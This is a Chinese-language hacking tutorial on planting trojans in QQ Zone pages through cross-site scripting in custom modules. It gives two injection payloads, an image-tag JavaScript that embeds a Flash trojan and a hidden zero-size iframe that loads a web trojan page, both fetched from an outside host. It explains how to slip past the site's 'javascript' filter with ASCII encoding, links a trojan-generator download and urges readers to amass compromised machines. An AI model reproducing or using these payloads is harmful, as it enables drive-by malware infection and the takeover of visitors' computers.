自从腾讯推出QQ空间(QQ-zone)后,各种跨站漏洞便不断暴出。虽然腾讯已经对QQ-zone进行了一次全面的更新,禁止了运行自定义脚本,不过通过我们的测试,发现所做的限制是很简单的,只需要转换一下字符就可以突破限制,在QQ空间上任意挂马。
方法一:挂Flash木马
打开QQ空间后,在页面中点击“自定义”按钮,在弹出的工具条上依次单击“个性设置”→“新建模块”命令,也可在QQ空间页面中直接按下
| 以下是引用片段: “<img src="javascript:document.getElementById(''Mlogo'').innerHTML+=''<div style=\''position:absolute;top:0;left:0;\''><EMBED src=\''http://www.binghewu.com.cn/muma.swf\'' quality=high wmode=\''transparent\'' WIDTH=\''925\'' HEIGHT=\''655\'' TYPE=\''application/x-shockwave-flash\''></div>'';"> ” |
代码中的Flash地址“http://www.binghewu.com.cn/muma.swf”,是刚才制作上传的SWF木马链接地址,可以更改为其它任意Flash木马文件地址。提交代码后,用户进入此QQ空间时,会自动打开显示上传的SWF木马Flash,从而在后台下载运行上兴木马服务端程序。
 |
图5 通过自定义模块添加SWF木马
小提示:QQ空间是通过检测用户提交的代码中,是否含用“javascript”之类的字符进行过滤的。在上面的代码中,将脚本部分代码用ASCII编码之后替换躲过了过滤,如“javascript”可以替换为“javascrip”,“p”为“p”的ASCII编码。具体ASCII编码转换可到“http://www.killadm.ful.cn/ascii.asp”查询(如图6)。
|
方法二:挂网页木马
上面的方法是直接在QQ空间中挂上一个Flash木马文件,实现的方法虽然比较简单,不过这个Flash文件有可能会让别人起疑心。既然我们可以在QQ空间中写入自定义代码,何不干脆直接挂上网页木马呢?
用上面同样的方法新建一个模块,代码如下:
| 以下是引用片段: “<div id=DI><img src="javascript:DI.innerHTML=''<iframe src="http://www.binghewu.com.cn/muma.htm" width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>''" style=display:none></div>” |
同样的,在上面的代码中已经作了ASCII码转换躲过过滤;“http://www.binghewu.com.cn/muma.htm”是网页木马的链接地址,可以换成其它木马网页地址。代码中的其它语句是用来定义模块大小的,由于设置为0,该模块将在QQ空间中被隐藏,但是并不影响木马网页的打开与运行。这里为了说明攻击效果,笔者对代码作了一些修改,将木马网页显示为新浪首页,说明完全可以在QQ空间中打开其它木马网页的(如图7)。
|
怎么样,在QQ群和QQ空间中挂马是不是很简单?掌握了这个方法,只要在比较火一点的QQ群或QQ空间中挂上你的木马,你很快就可以肉鸡成群了!
下载地址:
网页木马生成器 http://www.hackol.com/down.asp?id=4141&downid=0
